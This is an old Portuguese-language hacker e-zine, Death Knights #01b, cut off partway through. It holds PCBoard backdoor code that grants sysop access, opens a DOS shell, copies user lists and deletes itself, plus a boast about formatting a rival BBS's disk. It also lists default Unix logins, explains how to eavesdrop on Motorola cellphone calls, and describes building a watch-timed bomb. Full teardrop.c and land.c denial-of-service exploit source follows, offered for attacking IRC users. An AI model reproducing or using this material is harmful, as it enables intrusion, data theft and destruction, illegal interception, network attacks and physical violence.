             T H E

       $$Pц╦"цҐ$b   ,gPц╦"цҐ$b   ,gPц╦""цҐ$b  ,gPц╦$$$$$$$$цҐ$b  ,gц╦   цҐ$b
       $$     $$  $$     $$  $$     $$       $$$$$$      $$     $$
       $$     $$  $$     "цҐ  $$     $$        $$$$       $$     $$
       $$     $$  $$PцҐ"  ,p  $$,   ,$$        `$$'       $$,   ,$$
       $$     $$  gg     $$  $$$$$$$$$         $$        $$$$$$$$$
       $$     $$  $$     $$  $$'   `$$         $$        $$'   `$$
       $$     $$  $$     $$  $$     $$         $$        $$     $$
       $$     $$  $$     $$  $$     $$        .$$.       $$     $$
       T$,   gP'  T$,   gP'  $$     $$        $$$$       $$     $$
       $$PцҐцҐц╦"    $$PцҐцҐц╦"    "цҐ     цҐ"        $$$$       "цҐ     цҐ"
                  цҐ"      <Cacaio>
                                     K N i G H T S

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

DeathKnights #01b

e-mail: death@deathknights.com

page: http://www.deathknights.com

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

.-----------.
|   SECOES   \_______________________________________________________________
`----------------------------------------------------------------------------'

1  * ESCLARECiMENTOS                     Cacaio
2  * BBS MODING                          Bloddy Killer (BK)
3  * default logins/passwords            Cacaio
4  * ESCUTA EM CELULAR                   ReNeGaDe
5  * ANARCHY                             Cacaio
6  * PHUN STUFF TO USE @ iRC!            Cacaio
7  * Win 95 & NT passwords               Cacaio
8  * Comandos mais utiliazdos no Linux   pIst0lS and ReNeGaDe
9  * Phreakering                         Mantra
--

11 * BONUS  1                            Cacaio
12 * BONUS  2                            Cacaio

--

13 * FEW WORDS                           Cacaio

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

-=[  1  ]=-
.----------------.
| ESCLARECiMENTOS \__________________________________________________________
`----------------------------------------------------------------------------'

        Nao nos responsabilizamos pela informacao contida neste zine. Se voce
usar indevidamente qualquer informacao contida aqui, a responsabilidade e' to-
da sua.
        Este grupo nao visa nenhum fim lucrativo. Nos fazemos isto por diver-
sao e nada mais.
        Se voce nao gostou da informacao contida aqui, nao nos perturbe. O
problema e' todo seu.

        A secao de E-MAiL'z foi retirada deste numero da zine, pois a zine
ja estava com um tamanho um pouco grande, e nao queriamos fazer algo sacal.
A quem mandou e-mail, muito obrigado, nos lemos todos, e respondemos aos
que mereciam ser respondidos.

-=[  2  ]=-
.-------------.
|  BBS MODING  \_____________________________________________________________
`----------------------------------------------------------------------------'
                                    by BK

Vamos logo ao que importa...

PCBoard:
Pra lamaiada q nao sabe nem o q e PCBoard...
pare de ler aki...
pra quem sabe... vo ensinar a vc fazer algo mais pela sua BBS

PS: Ja tive BBS ... foi bom enquanto durou... depois enjuei e fechei!
foi a melhor BBS q teve aki (Ribeirao Preto)
BuRNiNG iN HeLL BBZ
funcionava das 23:00 as 6:00
no primeiro dia teve 25 ligacoes :) (pruma BBS pirata... e q funciona por
menos de 12 horas... ta muito bom!)

-=> Como fazer PPE? <=-
Bom.. PPE = Pcboard Programming eXecutable
blz.. vamo la
primeiro de tudo..
vc tem q declarar as variaveis
por exemplo.. vo fazer um PPE q apareca um determinado nome q foi salvo
numa variavel

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

String Nome
Tdk = "BK"
Cls
AnsiPos 25,12
Print Tdk
Delay 10
End

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

Vo explicar como funciona isso ai em cima

*String (Variavel a ser declarada) (String e usada pra Variavel alfanumerica
no caso de vc fazer uma calculadora em PPE.... nao sera usada "String"
e sim "Integer" q e uma variavel Numerica)
*Tdk (e o nome da variavel q vc declarou .. podia ser qualquer otra coisa)
*Cls (nem vo falar)
*AnsiPos (serve pra vc dizer onde vc quer q apareca uma determinada palavra
e tal)
*AnsiPos 25,12 (X,Y .. ou seja... X = 25 e Y = 12 (no meio da tela)
*Print (serve pra q apareca algo na tela ... normalmente o q ta na frente do
Print)
*Print Tdk (ou seja.. na posicao 25x 12y ira' aparecer a variavel Tdk q e'
= a BK)
*Delay (e um tempo de espera ... nao e = a 10 secs ... mas e um bom tempo pra
finalizacao de um PPE)
End (tbm nem vo falar nada)

e isso...
agora... vamos pros niveis mais avancados... agora vc so vai intender
c vc tiver muita facilidade ou tiver base em otra linguagem de programacao ou
vc ja souber bastante de PPE

-==> Como fazer uma BackDoor? <==-

uau.. isso e massa!
BackDoor rulez!
blz.. vamo la'!
PS: essas BackDoors ... foram feitas pra serem adicionadas em algum PPE
veja c nao seja burro e compile somente a BackDoor e passe pro SysOp
pq na hora q ele executar ja vai saber q e BacKD00r!
tipo..
coloque uma telinha ANSi bunitinha ... q rode sobre um PPE de UserInfo
ou um Bank.... ou .. ah.. sei la.. o q te vier na cabeca.. vc nao e tao
burro assim! :P

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

;*******************************************************
; BACK DOOR DE AUMENTAR O TEMPO, NIVEL DE SEGURANCA    *
; E DE COLOCAR UMA CERTA QUANTIDADE DE NUMEROS NO      *
; COMENTARIO2! (alguns bancos de tempo guardam o tempo *
;  nesse lugar,fazendo com q tenha tempo infinito)     *
;                                                      *
 IF ((U_NAME() == "SeuNome")) THEN
 GETUSER
 U_SEC = "110"
 ADJTIME 1000
 U_CMNT2 = "999999999999999999"
 PUTUSER
;*******************************************************

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

explicacao pros ignorantes! :)
*IF ((U_NAME() == "SeuNome")) THEN
(isso significa...  Se o UserName for igual `a (seunome) ENTAO..)
*GetUser (e tipo vai ate as informacoes desse user)
*U_SEC = "110" (ajusta seu nivel de seguranca pra 110 (geralmente 110 e o nivel
maximo .. q e' dado ao SysOp)
*AdjTime 1000 (qto tempo vc tem por dia na BBS? 1 hora? agora vc tera'
sua 1hora mais 1000 minutos :)
*U_CMNT2 = "9999999999999999" (bom isso nao e tao importante....
mas eu usei aki.. por q eu vi num Bank Time duma bbs daki q o tempo depositado
fica no UserComment2 ... intawm... c vc colocar tudo akilo no UserComment2..
e executar o Bank da BBS (nem todos Bank Time usam isso ... so os qual o SysOp
for muito otario ) ira' aparecer como tempo disponivel o numero q vc colocar la'!
*PutUser (serve pra confirmar as novas informacoes!)

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

;*******************************************************
; BACK DOOR DE CARREGAR O COMMAND.COM!!                *
; MOTIVO= FORMATAR O HD DA BBS CONCORRENTE OU PEGAR    *
; INFORMACOES PRIVADAS, ex: USER LIST                  *
 INT INT001
 IF ((U_NAME() = "SeuNome")) THEN
 Shell 1, INT001, "COMMAND COM2", ""
;*******************************************************

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

Explicacao:
*INT INT001 (variavel declarada.. nao e igual string e integer ... e tbm
nao vo explicar o q e' .. como eu disse.. aki e pros mais avancados...
c vc sabe algo de PASCAL / C / ASM .. ta blz... funciona igual (int) )
*IF .............. (se o nome for igual "seunome" entao...
*Shell (pra executar um comando do DOS)
intawm fica
*Shell 1, Int001(1), "COMMAND COMx"(2), ""(3)
(1) (variavel q nao precisa ter definicao alguma .. pois e INT)
(2) (carrega o COMMAND.com ... tipo.. COMMAND COM(porta do modem)
(porta do modem nao e'do seu modem sacou sua anta...e a porta em q o modem
da BBS esta')
(3) (deixa do jeito q ta'! pois e pra complementar o comando "Shell")

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

;*************************************************************************************
; BACK DOOR PARA CAIR PRO DOS, PUXAR O USER LIST, AUMENTAR O NIVEL
; E PRA DELETAR O PPE
;
STRING STRING001
STRING STRING002
STRING STRING003
STRING STRING004
INT INT001

CLS
ANSIPOS 2,5
PRINT "@X0FDigite 1 pra CAIR pro DOS, 2 pra puxar o USER LIST, 3 para nivel 110, 4 para deletar o PPE"
ANSIPOS 13,8
INPUTTEXT "@X0FQual a sua opcao? _", STRING001, 1, 1
IF ((STRING001 == 1)) THEN
ANSIPOS 6,10
INPUTTEXT "@X0FQual a porta q vc deseja usar pra CAIR pro DOS? _", STRING003, 1, 1
SHELL 1, INT001, "COMMAND COM" + STRING003, ""
ENDIF
IF ((STRING001 == 2)) THEN
SHELL 1, INT001, "COPY C:\PCB\MAIN\USERS C:\TDK.TXT", ""
FLAG "C:\TDK.TXT"
ENDIF
IF ((STRING001 == 3)) THEN
GETUSER
U_SEC = "110"
ADJTIME 100
PUTUSER
ENDIF
IF ((STRING001 == 4)) THEN
DELETE PPEPATH() + "BIH-BOOT.PPE"
ENDIF
ENDIF
;**************************************************************************************************

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

Explicacao:
as "String" vc ja sabe o q e'
INT tbm... c nao sabe deixa do jeito q ta'
bom.. vo explicar so os comandos mais novos.. q vc ainda nao viu nos eskemas
a cima!
INPUTTEXT (vc vai digitar aki! no caso do primeiro INPUTTEXT .. vc vai digitar a opcao!)
IF ((STRING001 == 1)) THEN... (Se a opcao escolhida for = a "1".. ENTAO..)
dai pra frente e igual...
blz.. vamo pro IF ((STRING002 == 2)) THEN
akele Shell ali.. executa um comando no DOS .. ele vai copiar o arkivo de USER
pro C:\ criando um TDK.TXT (Geralmente o arkivo de user fica no C:\PCB\MAIN\USERS)
ai e com vc...
ajuste a BackDoor pro Drive onde roda a BBS e pro Dir onde ta o PCBoard
FLAG (marca um arkivo.. no caso.. TDK.TXT)
blz.. faca o download... nao e tao complicado de entender o arkivo!
aaaaaaah... os ENDIFs serve pra vc finalizar um IF (hehehe tem q ser
MUITO BURRO pra nao saber isso)
STRING001 = 3 ali serve pra almentar seu nivel
STRING001 = 4 (bom... essa backdoor q eu fiz... usei pra pegar o userlist
de uma bbs e essa backdoor ficava dentro de um PPE de BOOT q eu fiz pressa
BBS intawm tem a linha q deleta o PPE prele nao perceber q foi de la' q deu
problema (nao q ele va' descobrir.. mas de repente ele pega um decompilador
e comeca a decompilar tudo quante' ppe q ele tem e tal.. ) e depois usei
o nome do SysOp pra catar uma porrada de arkivo e depois... como nao
precisava mais da BBS... hehehe adivinha o q eu fiz! :)))
tipo..
C:\> format c: /q /autotest
isso refresca sua memoria? :)
PS: se o SysOp descobrir q foi voce... o problema e teu...
eu fiz isso 3:00 da matina!
pensa um poko e faca isso tbm nesse horario ... bom.. eu nao tenho nada a ver
com isso!

;**********************************************************************************
; TODAS AS BACK DOORS A CIMA!!                                                    *
;                                                                                 *
;                                                                                 *
;
STRING STRING0011
STRING STRING0012
STRING STRING0013

IF (U_NAME() == "BUG MASTER") THEN
CLS
ANSIPOS 1,5
PRINT "@X0FDigite 1 DOS, 2 pra USER LIST, 3 para nivel, 4 para deletar o PPE"
ANSIPOS 13,8
INPUTTEXT "@X0FQual a sua opcao? _", STRING0011, 1, 1
IF ((STRING0011 == 1)) THEN
ANSIPOS 6,10
INPUTTEXT "@X0FQual a porta q vc deseja usar? _", STRING0012, 1, 1
SHELL 1, INT001, "COMMAND COM" + STRING0012, ""
ENDIF
IF ((STRING0011 == 2)) THEN
SHELL 1, INT001, "COPY C:\PCB\MAIN\USERS C:\PCB\PPL\TDK.TXT", ""
FLAG "C:\PCB\PPL\TDK.TXT"
ENDIF
IF ((STRING0011 == 3)) THEN
ANSIPOS 15,9
inputtext "Qual o novo nivel? _", STRING0013, 3, 3
GETUSER
U_SEC = STRING0013
ADJTIME 100
PUTUSER
ENDIF
IF ((STRING0011 == 4)) THEN
DELETE PPEPATH() + "CARRIER.PPE"
ENDIF
ENDIF
;**********************************************************************************
Explicacao:
essa ai tem tudo
eu usei num PPE q eu fiz pra mesma BBS ... so q era um ppe de testar conexao
e tal... intawm tem opcao pra deletar o PPE
agora q ja expliquei tudu la pra cima...
leia ai'.. larga de ser burro e tenta aprender
PS: nao existe curso de PPE... intawm.. aprenda sozinho... assim como eu fiz!

.oO0=-> BBS MoDd!NG <-=0Oo.  By BK!
Qualquer coisa to em algum IRC server da BrasNET
meu nick = BK
mas pelamordedeus nao me venha com pergunta escrota!
[]'s!

-=[  3  ]=-
.-------------------------.
| default logins/passwords \_________________________________________________
`----------------------------------------------------------------------------'
                                by Cacaio

        Bem... muitas vezes o pessoal esquece de mudar ou desabilitar os
logins/passwords que ja vem com o sistema. E como tem muita gente que nao
sabe e eu sem mais o que fazer, vou soltar eles aqui pra voces...

Login:                    Password:

root                       root
root                       system
sys                        sys
sys                        system
daemon                     daemon
uucp                       uucp
tty                        tty
test                       test
bin                        bin
adm                        adm
adm                        admin
admin                      adm
admin                      admin
sysman                     sysman
sysman                     sys
sysman                     system
sysadmin                   sysadmin
sysadmin                   sys
sysadmin                   system
sysadmin                   admin
sysadmin                   adm
who                        who
learn                      learn
uuhost                     uuhost
guest                      guest
host                       host
nuucp                      nuucp
rje                        rje
games                      games
games                      player
sysop                      sysop
root                       sysop
demo                       demo

        Se o admnistrador for muito TAPADO(ou esquecido) estas contas ainda
estarao ativas! Aih eh soh entrar, tirar o passwd do shadow, desencriptar e
fazer a festa! E eu ja aviso.. nao venha me perguntar nada por que nao vou
me dar o trabalho de te responder. Se voce nao sabe como proceder, aprenda
sozinho, pois, como voce sabe, ninguem nasceu sabendo e muitas pessoas
aprenderam tudo o que sabem sozinhas. Se voce tiver um pouquinho de massa
cinzenta voce tambem pode... bah...

-=[  4  ]=-
.------------------.
| ESCUTA EM CELULAR \________________________________________________________
`----------------------------------------------------------------------------'
                                by ReNeGaDe

       Para quem nao sabe sou o vice-prez do grupo junto com o pIst0ls
  nessa zine resolvi contribuir com escuta em celulares com os dois
  metodos que sei para certos modelos da marca MOTOROLA. Primeiro vou
  ensinar como voce fazer escuta em motorolas que tenham 3 pinos na
  conexao na bateria como o PT-550 ou Lite existem outros Motorolas
  alem desses mais agora so me lembro desses dois. E depois vou falar
  como faz escuta em Motorolas com apenas 2 pinos que e um pouco mais
  complicado os Motorolas que conheco de dois pinos sao o Elite e o
  Star Tac o que tenho ;)) mais deixa de falar muito e vamos ao que
  interessa.
      Esse tipo de escuta so e para ouvir outros celulares e nao tele
  fones normais e nem pense que durante a escuta vc podera podera fala
  porque voce so gastara saliva. Assim nao acrescenta nada na conta so
  gastara a carga da bateria do celular. Tambem nao vou garantir que es
  te tipo de escuta pegara na sua cidade pelo menos na minha pega.

  1.0-) Escuta em Motorola com 3 pinos ex: Lite e PT-550

       Primeiro passo voce vai pegar o celular e tirar a bateria no celular
  onde tem a conexao vai ter um pinozinho do meio abaixado o que voce terar
  que fazer e a ligacao do pino abaixado com o a bateria do celular para vo
  ce fazer isso ou levante o pino abaixado o que nao recomendo acho melhor
  pegar um papel aluminio fazer tipo uma linha com ele dobra-lo para que fi
  que duas pontas uma sera introduzida no espaco do pino abaixado e ficara
  a outra ponta para fora que dara contato com a bateria para quem nao con
  seguiu entender que pino e esse vou fazer um ilustracao abaixo.

                                             |
                                            _|_
                                  |--------|   |-|
                                  |              |
                                  |              |
                                  |              |
                                  |              |
                                  |              |
                                  |              |
                                  |          ||| |
                                  |           ^  |
                                  |           |__|______ Esse ai e o pino
                                  |______________|       que estara baixado

       Apos ter colocado o papel aluminio vc recolocara a bateria ai quando
  voce ligar aparecerar uns numeros tipo 327 142 ai ficara mudando para outro
  isso quer dizer que a conexao pegou. Ai a ordem para comecar a escuta sera
  apenas preciso voce apertar o que estiver  entre "" do lado sera a descricao
  do comando:

  1- " # "  Entra em test mode
  2- " 08# " Liga auto falantes
  3- " 11 + canal de 00 a 1023 + # " ex: " 1101# "

   Ps: Na minha cidade os canais desponiveis para ouvir conversas sao de
   00 a 990 depois desses e possivel que voce nao ouca nada porque acimas
   desses e provavel que seja utilizado para a transmissao de dados da com
   pania de telefonia da sua cidade.

  1.1-) Escuta em Motorola com 2 pinos ex: Elite e Star Tac

     Nesses modelos de motorolas o metodo e diferente voce so precisa seguir
  os comandos abaixo:

  1- " FCN00**83786633STO "
  2- " # "
  3- " 08# "
  4- " 11 + canal 300 ou 991 + # "

  Ps: Nesses modelos de apenas 2 pinos so ouve 2 canais e apos o 3 comando
  voce ja comecara a ouvir uma conversa e que apos o 3 comando ele ja cai no
  canal 300 ai para vc mudar para o canal 991 voce utiliza o comando 4. Mais
  uma coisa os canais podem variar de cidade para eu descobrir que canal era
  aquele que tinha caido e o outro canal que esse modelo escuta sabe o traba
  lho que deu ne digitando de 00 a 1023 durante 3 horas foi cansativo mais va
  leu e se vc nц├o quiser ter esse trabalho apos o comando 3 voce para mais se
  voce for que nem eu e quiser descobrir que canal e esse ja que nao e o 330
  e o 991 vai ter um bom trabalho e se voce digitar um canal invalido desliga
  ra os alto falantes e vc tera que repetir o comando 3 e depois tentar outro
  canal usando o comando 4.

      Valeu ai d00dz!! Espero que tenham gostado dessa materia que deu muito
  trabalho para escrever mais valeu ;) Na proxima zine nem sei o que vou escre
  ver mais o que vim na cabeca eu boto !! Aproveitem toda as informacoes aqui
  contidas pois temos otimos membros e garanto que escreveram otimas materias.

-=[  5  ]=-
.----------.
|  ANARCHY  \________________________________________________________________
`----------------------------------------------------------------------------'
                                by Cacaio

        Esta eh a primeira vez que o The Death Knights fala de anarchy, mas
decidimos inovar. Nao iremos fazer como outros zines que somente traduziram
textos do Anarchist's Cookbook(http://ticino.eunet.ch/chnews/cookbook) e di-
sseram ter sido os autores. Aqui nos iremos colocar coisas desenvolvidas
por nos proprios, mas com o auxilio de alguns livros da Policia Federal Bra-
sileira na parte de bombas. Antes de comecar a falar, quero deixar bem claro
que nao tenho nenhuma responsabilidade do que pode acontecer se executado
algum dos procedimentos citados, tendo em vista que alguns poderao levar a
danos fisicos, morais, materiais e alguns ate a morte.

        Bombas...

        Neste zine somente direi o basico para fazer bombas, mas com este
conhecimento e criatividade voce podera fazer bombas poderosas. Para fazer
uma bomba, voce precisa do explosivo, condutor e do detonador. O exposivo voce
usa qualquer um, TNT, C4, voce escolhe... na parte do detonador e onde entra
sua criatividade, pois o detonador pode ser desde um simples alarme de re-
logio de pulso do Paraguai ate um complexo circuito. Como nao falarei muito
sobre isto neste zine, direi somente como montar uma bomba relogio com um
relogio de pulso(ah, e o explosivo.. hehehe).
        Primeiro, voce deve arrumar qualquer material que seja um bom condutor
de calor(e fino). Apos isto, ja com o explosivo e o relogio em maos, abra o
relogio, tire o circuito e desencaixe os fios que estao presos ao alarme.
Agora, prenda estes mesmos fios ao material condutor de calor, e o material
preso ao explosivo. Coloque o relogio para despertar no horario que voce quer
(nao se esqueca de ligar o barulihnho!), e risque o circuito perto dos botoes.
        Pronto! So esperar o relogio despertar e.... b00m!!

        Posso assegurar que esta bomba funciona pois eu mesmo ja testei.

OBS.: o explosivo precisa ser MUiTO sensivel ao calor, quando eu fiz o teste
nao coloquei diretamente o condutor com o explosivo, mas sim com polvora que
estava em contato com o explosivo. Voce pode tentar de varias maneiras...

-=[  6  ]=-
.-------------------------.
| PHUN STUFF TO USE @ iRC! \_________________________________________________
`----------------------------------------------------------------------------'
                                by Cacaio

        O iRC e' feito basicamente para o chat, mas as vezes voce encontra
alguem que voce quer sacanear por la', ou so por diversao... e nao sabe o
que fazer. Mas agora direi alguns metodos de como voce se divertir! Os co-
digos seguintes podem ser feito tanto com alguem no iRC quanto com qualquer
maquina que voce saiba que esta na net...

        SUBSECOES:
                        * TEARDROP
                        * LAND
                        * SSPING
                        * WINNUKE
                        * HANSON

-=> TEARDROP <=-

        O teardrop e' um codigo que aproveita o bug de fragmentacao de iP
encontrado nas kernels de Linux mais antigas, WinNT 4.0, Win95 e outros...
O codigo seguinte pode ser usado tanto em Linux quanto em FreeBSD. Vamos
ao codigo...

[teardrop.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000
#define IPH     0x14
#define UDPH    0x8
#define PADDING 0x1c
#define MAGIC   0x3
#define COUNT   0x1

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

-=> LAND <=-

        Este e' bem divertido... hehehe... o que acontece? Voce manda um
pacote com o SYN vindo de um host, em uma porta aberta que mandara para
ela mesma o pacote, entrando em loop e paralisando a maquina! A pena e'
que se o usuario tiver paciencia para esperar 100 segundos, a maquina
voltara a funcionar (valeu Sabrina!).

Lista dos OS's vulneraveis:

-*- BSDI 2.1
-*- FreeBSD 2.2.2-RELEASE
-*- FreeBSD 2.2.5-RELEASE
-*- FreeBSD 2.2.5-STABLE
-*- FreeBSD 3.0-CURRENT
-*- HP-UX 10.20
-*- MacOS 8.0
-*- NetBSD 1.2
-*- NeXTSTEP 3.0
-*- NeXTSTEp 3.1
-*- OpenBSD 2.1
-*- Solaris 2.5.1
-*- SunOS 4.1.4
-*- Windows 95
-*- Windows NT

E aqui o codigo!
[land.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

-=> SSPING <=-

        Super Sized PiNG... precisa dizer mais algo? :)
        (ah, funciona em Windows e em algumas versoes do MacOs)

[ssping.c]
